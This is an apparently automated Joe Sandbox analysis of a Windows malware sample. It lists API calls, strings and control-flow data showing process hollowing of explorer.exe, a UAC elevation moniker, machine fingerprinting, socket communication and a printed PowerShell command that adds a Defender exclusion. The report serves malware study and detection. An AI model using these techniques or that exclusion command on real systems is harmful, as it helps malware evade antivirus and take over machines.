                              • wnsprintfW.SHLWAPI ref: 01097357
                              • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 0109736F
                              • wnsprintfW.SHLWAPI ref: 01097389
                              • SetFileAttributesW.KERNEL32(?,00000006), ref: 010973A5
                              • lstrcpyW.KERNEL32(?,/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"), ref: 010973B7
                              • GetUserNameW.ADVAPI32(?,?), ref: 010973D6
                              • NetUserGetInfo.NETAPI32(00000000,?,00000001,00000000), ref: 010973EB
                              • NetApiBufferFree.NETAPI32(00000000), ref: 01097400
                              • CoInitializeEx.OLE32(00000000,?), ref: 01097417
                              • lstrlenW.KERNEL32({3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 01097431
                              • wsprintfW.USER32 ref: 0109746E
                              • CoGetObject.OLE32(?,?,01092508,00000000), ref: 0109748B
                              • CoUninitialize.OLE32 ref: 010974CB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnvironmentExpandStrings$Userlstrlenwnsprintf$AttributesBufferDirectoryErrorFileFreeInfoInitializeLastNameObjectSystemUninitializeWow64lstrcpywsprintf
                              • String ID: "%s"$$$%%ProgramData%%\r%Sr.js$%ComSpec%$%ProgramFiles%$%ProgramW6432%$/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"$Elevation:Administrator!new:%s${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                              • API String ID: 3941589607-3081872691
                              • Opcode ID: 279954542f35fc4f1b51231e2d95ecd28b83bc77621643dd4d57a2fa9b72b01c
                              • Instruction ID: 8e3552fc48bc62fd5962264cb44a7ecfa56d56886a868c7a9c08879859c0d541
                              • Opcode Fuzzy Hash: 279954542f35fc4f1b51231e2d95ecd28b83bc77621643dd4d57a2fa9b72b01c
                              • Instruction Fuzzy Hash: 99516DB2940218ABDF20DB94DC59FDEB7BCBB04714F040095FA89E7140DBB5AA84DFA1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 731 1095c50-1095c63 732 1095c69-1095c8a GetModuleHandleW GetProcAddress 731->732 733 1095f9e-1095fa6 731->733 732->733 734 1095c90-1095ca1 732->734 734->733 735 1095ca7-1095cae 734->735 736 1095cb0-1095cb5 735->736 737 1095cb7-1095cba 735->737 738 1095cc5 736->738 737->733 739 1095cc0 737->739 740 1095cc7-1095cd0 738->740 739->738 740->740 741 1095cd2 740->741 742 1095cd4-1095ce0 741->742 742->742 743 1095ce2-1095ce8 742->743 744 1095cf0-1095cfe 743->744 744->744 745 1095d00 744->745 746 1095d02-1095d0b 745->746 746->746 747 1095d0d-1095d45 CreateProcessW 746->747 748 1095d4b-1095d8c NtQueryInformationProcess ReadProcessMemory GetThreadContext 747->748 749 1095f95-1095f9d 747->749 750 1095d92-1095d9f 748->750 751 1095f85-1095f93 CloseHandle * 2 748->751 750->751 753 1095da5-1095df4 VirtualAllocEx WriteProcessMemory 750->753 751->749 754 1095e2c-1095e30 753->754 755 1095df6-1095e07 753->755 758 1095f46-1095f7f WriteProcessMemory SetThreadContext ResumeThread 754->758 759 1095e36-1095e40 754->759 756 1095e09-1095e1b WriteProcessMemory 755->756 757 1095e1d-1095e28 755->757 756->757 757->755 760 1095e2a 757->760 758->751 759->758 761 1095e46-1095e49 759->761 760->754 762 1095e50 761->762 763 1095e52-1095e5a 762->763 763->763 764 1095e5c-1095e6f 763->764 765 1095e71-1095e76 764->765 766 1095e90-1095e9d 764->766 767 1095e78-1095e83 765->767 768 1095f2c-1095f3a 766->768 769 1095ea3-1095ea9 766->769 767->768 770 1095e89-1095e8b 767->770 768->762 772 1095f40 768->772 771 1095eb0-1095ec5 769->771 770->767 773 1095e8d 770->773 774 1095f27-1095f2a 771->774 775 1095ec7-1095edb 771->775 772->758 773->766 774->768 774->771 776 1095edd-1095f1c ReadProcessMemory WriteProcessMemory 775->776 777 1095f1f-1095f25 775->777 776->777 777->774 777->775
                              APIs
                              • GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 01095C73
                              • GetProcAddress.KERNEL32(00000000), ref: 01095C7A
                              • CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 01095D3D
                              • NtQueryInformationProcess.NTDLL ref: 01095D5A
                              • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 01095D74
                              • GetThreadContext.KERNEL32(?,00010007), ref: 01095D84
                              • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 01095DB8
                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 01095DE2
                              • WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 01095E1B
                              • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 01095EFB
                              • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 01095F13
                              • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 01095F5B
                              • SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 01095F76
                              • ResumeThread.KERNEL32(?,?,?,00000000), ref: 01095F7F
                              • CloseHandle.KERNEL32(?), ref: 01095F8E
                              • CloseHandle.KERNEL32(00000000), ref: 01095F93
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
                              • String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
                              • API String ID: 918112823-4001407722
                              • Opcode ID: b670dbd62a091c83408e48781cba194b2dfa10b89f023a880e5bcefc1ce4816c
                              • Instruction ID: 31b3329ad8bf6d3d662613589280e60f1556cd0e402377c687e1c95455f71dd3
                              • Opcode Fuzzy Hash: b670dbd62a091c83408e48781cba194b2dfa10b89f023a880e5bcefc1ce4816c
                              • Instruction Fuzzy Hash: 99B1B071A00218AFDF21CFA9DC94BEDBBB5FF48314F1440AAEA88E7291D7359941DB10
                              APIs
                              • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 01097C3A
                              • wnsprintfA.SHLWAPI ref: 01097CD2
                              • wsprintfA.USER32 ref: 01097CF9
                              • lstrcmpA.KERNEL32(?,Start), ref: 01097F7B
                              • EnterCriticalSection.KERNEL32(0109A090), ref: 01097FD1
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 01098038
                              • HeapAlloc.KERNEL32(00000000), ref: 0109803F
                              • GetProcessHeap.KERNEL32(00000008,?,?), ref: 0109804A
                              • HeapReAlloc.KERNEL32(00000000), ref: 01098051
                              • LeaveCriticalSection.KERNEL32(0109A090), ref: 010980A8
                                • Part of subcall function 01095FB0: GetModuleHandleW.KERNEL32(ntdll), ref: 01095FCD
                                • Part of subcall function 01095FB0: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 01095FE1
                                • Part of subcall function 01095FB0: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 01095FEC
                                • Part of subcall function 01095FB0: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 01095FF7
                                • Part of subcall function 01095FB0: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 01096002
                                • Part of subcall function 01095FB0: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 0109600D
                                • Part of subcall function 01095FB0: GetTempPathW.KERNEL32(000000F6,?), ref: 01096026
                                • Part of subcall function 01095FB0: wnsprintfW.SHLWAPI ref: 01096061
                                • Part of subcall function 01095FB0: PathCombineW.SHLWAPI(?,?,?), ref: 0109607B
                                • Part of subcall function 01095FB0: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 010960A2
                                • Part of subcall function 01095FB0: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 010960C6
                                • Part of subcall function 01095FB0: SetEndOfFile.KERNEL32(00000000), ref: 010960C9
                                • Part of subcall function 01095FB0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 010960D6
                                • Part of subcall function 01095FB0: wnsprintfW.SHLWAPI ref: 010960F4
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 010980C7
                              • HeapFree.KERNEL32(00000000), ref: 010980CE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
                              • String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
                              • API String ID: 851647271-3778496198
                              • Opcode ID: 363570388c7a0f5ef070239fe8c44df4fafe56a7fa7b83849c0ea76602edf16d
                              • Instruction ID: f27e5293c54002ff862420fea465a386b4277266945f9692f60ee27212d12843
                              • Opcode Fuzzy Hash: 363570388c7a0f5ef070239fe8c44df4fafe56a7fa7b83849c0ea76602edf16d
                              • Instruction Fuzzy Hash: EEE11672B142568FEF698F68C4707BD7BE2BF85300F1881ADD9C597246DB358841EB90
                              APIs
                              • InitializeCriticalSection.KERNEL32(0109A090), ref: 010986F2
                                • Part of subcall function 01097180: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 010971AA
                                • Part of subcall function 01097180: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 010971C6
                                • Part of subcall function 01097180: GetProcessHeap.KERNEL32(00000008,?), ref: 010971D9
                                • Part of subcall function 01097180: HeapAlloc.KERNEL32(00000000), ref: 010971E0
                                • Part of subcall function 01097180: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 010971FD
                                • Part of subcall function 01097180: RegCloseKey.ADVAPI32(80000002), ref: 01097209
                              • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0109871F
                              • StringFromGUID2.OLE32(?,?,00000080), ref: 01098778
                              • wsprintfA.USER32 ref: 0109878F
                              • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 010987A3
                              • GetLastError.KERNEL32 ref: 010987AE
                              • ExitProcess.KERNEL32 ref: 010988B3
                                • Part of subcall function 01092690: GetTickCount.KERNEL32 ref: 01092692
                              • WSAStartup.WS2_32(00000202,?), ref: 010987EC
                              • CryptAcquireContextA.ADVAPI32(0109A4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 01098805
                              • CryptAcquireContextA.ADVAPI32(0109A4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 01098821
                              • CoInitializeEx.OLE32(00000000,00000000), ref: 0109886C
                              • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 01098883
                              • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 010988A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
                              • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
                              • API String ID: 267019445-2941900213
                              • Opcode ID: 420f4f4daf63dca59812eb4f6a472212f2443f9befd1f5d9575f24cacbc758f1
                              • Instruction ID: 314c1fa775fb7cb61aaef8ed0b716bed4c48a5c66a4001dca63be0d962a836fc
                              • Opcode Fuzzy Hash: 420f4f4daf63dca59812eb4f6a472212f2443f9befd1f5d9575f24cacbc758f1
                              • Instruction Fuzzy Hash: C141E970740309EFEB24DB50ED2AFA937B8FB44710F104069F284EA185EBB556449B65
                              APIs
                              • InitializeCriticalSection.KERNEL32(0109A090), ref: 010986F2
                                • Part of subcall function 01097180: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 010971AA
                                • Part of subcall function 01097180: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 010971C6
                                • Part of subcall function 01097180: GetProcessHeap.KERNEL32(00000008,?), ref: 010971D9
                                • Part of subcall function 01097180: HeapAlloc.KERNEL32(00000000), ref: 010971E0
                                • Part of subcall function 01097180: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 010971FD
                                • Part of subcall function 01097180: RegCloseKey.ADVAPI32(80000002), ref: 01097209
                              • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0109871F
                              • StringFromGUID2.OLE32(?,?,00000080), ref: 01098778
                              • wsprintfA.USER32 ref: 0109878F
                              • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 010987A3
                              • GetLastError.KERNEL32 ref: 010987AE
                              • ExitProcess.KERNEL32 ref: 010988B3
                                • Part of subcall function 01092690: GetTickCount.KERNEL32 ref: 01092692
                              • WSAStartup.WS2_32(00000202,?), ref: 010987EC
                              • CryptAcquireContextA.ADVAPI32(0109A4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 01098805
                              • CryptAcquireContextA.ADVAPI32(0109A4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 01098821
                              • CoInitializeEx.OLE32(00000000,00000000), ref: 0109886C
                              • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 01098883
                              • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 010988A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
                              • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
                              • API String ID: 267019445-2941900213
                              • Opcode ID: e4da71bc6332066cd3a239cbdc0f0cd484ab969f1e2363b0ec131d5e58a47e99
                              • Instruction ID: d933b58a7231190a8c26d2f2c4cd29cbbee627b46ef2f2932a4679f4bbfb5fd8
                              • Opcode Fuzzy Hash: e4da71bc6332066cd3a239cbdc0f0cd484ab969f1e2363b0ec131d5e58a47e99
                              • Instruction Fuzzy Hash: 9B51F770740309EFEB24DB60EC2AF9937B4FB45710F1040A9F684EE185E7B545448B95
                              APIs
                              • inet_pton.WS2_32(00000002,?,?), ref: 01097563
                              • htons.WS2_32(?), ref: 0109756E
                              • socket.WS2_32(00000002,00000001,00000006), ref: 01097586
                              • connect.WS2_32(00000000,?,00000010), ref: 010975A4
                              • recv.WS2_32(00000000,?,00000002,00000000), ref: 010975BC
                              • GetProcessHeap.KERNEL32(00000008,00000024), ref: 010975DD
                              • HeapAlloc.KERNEL32(00000000), ref: 010975E0
                              • CreateThread.KERNEL32(00000000,00000000,Function_000063F0,00000000,00000000,00000000), ref: 0109765B
                              • CloseHandle.KERNEL32(00000000), ref: 01097666
                              • recv.WS2_32(00000000,?,00000002,00000000), ref: 0109767E
                              • closesocket.WS2_32(00000000), ref: 0109768D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 01097696
                              • HeapFree.KERNEL32(00000000), ref: 01097699
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010976B3
                              • HeapFree.KERNEL32(00000000), ref: 010976B6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
                              • String ID:
                              • API String ID: 2784442062-0
                              • Opcode ID: 1f97c443db5f3f322a401ab36daa4636479e6ffa7a5c8bc39bbc8e13736c0f39
                              • Instruction ID: 65a019991ffc442bed84dd34e4074a51628fa8aeb93bad74cc6edeaa7ae0bbc2
                              • Opcode Fuzzy Hash: 1f97c443db5f3f322a401ab36daa4636479e6ffa7a5c8bc39bbc8e13736c0f39
                              • Instruction Fuzzy Hash: 5D410275A00345AAEB304F78AC69FAB7FA8BF48720F040199FAC1DB182D7759441DBE4
                              APIs
                              • CryptGenRandom.ADVAPI32(00000020,?), ref: 010992C8
                                • Part of subcall function 01092830: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,01099315,00000000), ref: 01092852
                                • Part of subcall function 01092830: HeapAlloc.KERNEL32(00000000,?,?,?,?,01099315,00000000), ref: 01092859
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01099325
                              • HeapFree.KERNEL32(00000000), ref: 0109932C
                              • wsprintfA.USER32 ref: 0109935F
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01099398
                              • HeapFree.KERNEL32(00000000), ref: 0109939B
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010993A0
                              • HeapFree.KERNEL32(00000000), ref: 010993A3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$Free$AllocCryptRandomwsprintf
                              • String ID: %d|%s|%s|%s$4jdmhuQI
                              • API String ID: 4113358155-2151915281
                              • Opcode ID: bc9f3ad5d0dd3a286bc3e12f271f0d2c5b42ad3c27615a81e48032ac9971ab1f
                              • Instruction ID: 7d2064b3e55f3a524bb850fbaeadc82cdfd91fee73b8896ce9388f91c66c7d2b
                              • Opcode Fuzzy Hash: bc9f3ad5d0dd3a286bc3e12f271f0d2c5b42ad3c27615a81e48032ac9971ab1f
                              • Instruction Fuzzy Hash: 3D212BB1B003087BEF20A7A5AC26FEF7B6CEF84714F040154FA89AB1C5E9259915D7B1
                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0109635D
                              • OpenProcessToken.ADVAPI32(00000000), ref: 01096364
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 01096379
                              • CloseHandle.KERNEL32(?), ref: 01096386
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 010963B0
                              • CloseHandle.KERNEL32(?), ref: 010963BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 158869116-3733053543
                              • Opcode ID: 3d003c102de091644cf23540f18ddb2c67daae67f314914a5b7e1e8074962df8
                              • Instruction ID: 0213fff0e029fee3bc9a5a021461e531c050f835f273ab6a606b0009b0d4b983
                              • Opcode Fuzzy Hash: 3d003c102de091644cf23540f18ddb2c67daae67f314914a5b7e1e8074962df8
                              • Instruction Fuzzy Hash: C4018F71A40208EBEF209BE4AD0EFEE7BBCFB04711F104095F944A6180D7764A149BA1
                              APIs
                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 001599D9
                              • FindNextFileW.KERNEL32(00000000,?), ref: 00159A54
                              • FindClose.KERNEL32(00000000), ref: 00159A76
                              • FindClose.KERNEL32(00000000), ref: 00159A99
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID:
                              • API String ID: 1164774033-0
                              • Opcode ID: b57b9216b28b4012c65b50b43925a37b5723360e5117930cc740e02598420841
                              • Instruction ID: a6352ba1c15c99bcf534a71b39a6ee2101a3c63a16b834bd251552a46869e9f9
                              • Opcode Fuzzy Hash: b57b9216b28b4012c65b50b43925a37b5723360e5117930cc740e02598420841
                              • Instruction Fuzzy Hash: D841A871A00529EFDF20DF64DC8D9AEB7B9EB85306F104195E829DB144E7709E88CB61
                              APIs
                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00154E95
                              • IsDebuggerPresent.KERNEL32 ref: 00154F61
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00154F7A
                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00154F84
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                              • String ID:
                              • API String ID: 254469556-0
                              • Opcode ID: bcdc92871c6bafacab9bd86d39085c1d8f551c4630adb75a6ec66f499925a23f
                              • Instruction ID: 2d3488510eb7fbae6b6f39a3a6ae0104e335883eb5c0c3a963f31b49f391e88f
                              • Opcode Fuzzy Hash: bcdc92871c6bafacab9bd86d39085c1d8f551c4630adb75a6ec66f499925a23f
                              • Instruction Fuzzy Hash: 8831D675D05218DBDB21DFA4DD497CDBBB8AF08305F1041AAE81CAB290EB719B888F45
                              APIs
                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001577C3
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001577CD
                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001577DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                              • String ID:
                              • API String ID: 3906539128-0
                              • Opcode ID: f8e80ce788db1207e4a113ab8a637b63622fb337fff2ff8ebad543d5c33c02a5
                              • Instruction ID: 6ab52d1392ecba28f041e44e1d84d74fc8805b09686822f6a8035292c7f8a0bf
                              • Opcode Fuzzy Hash: f8e80ce788db1207e4a113ab8a637b63622fb337fff2ff8ebad543d5c33c02a5
                              • Instruction Fuzzy Hash: D431A47491121CEBCB21DF64DD8979DBBB8BF18311F5041DAE82CAA290E7709B898F44
                              APIs
                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0015FBBC,?,?,00000008,?,?,0015F7BF,00000000), ref: 0015FDEE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ExceptionRaise
                              • String ID:
                              • API String ID: 3997070919-0
                              • Opcode ID: 6699b79528704ac9e4b762fb911eb6814a445d0c89d72945b5561266773d3fb8
                              • Instruction ID: f4b74087899f628ba795db9f05d5309b020fb8f35ec5065139abdc4f5bb040c0
                              • Opcode Fuzzy Hash: 6699b79528704ac9e4b762fb911eb6814a445d0c89d72945b5561266773d3fb8
                              • Instruction Fuzzy Hash: 64B13A31510608DFD719CF28C48AB647BA1FF45366F26866CECA9CF2A2C335D996CB40
                              APIs
                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0015513B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FeaturePresentProcessor
                              • String ID:
                              • API String ID: 2325560087-0
                              • Opcode ID: 61eb2c024791c9cea42fbda7cef9d1546da1acbc23d5c0b8ed24c47be1284682
                              • Instruction ID: 78201946d69e241843faa2591c4fc794810519a7991908a458d1e007ac6b5861
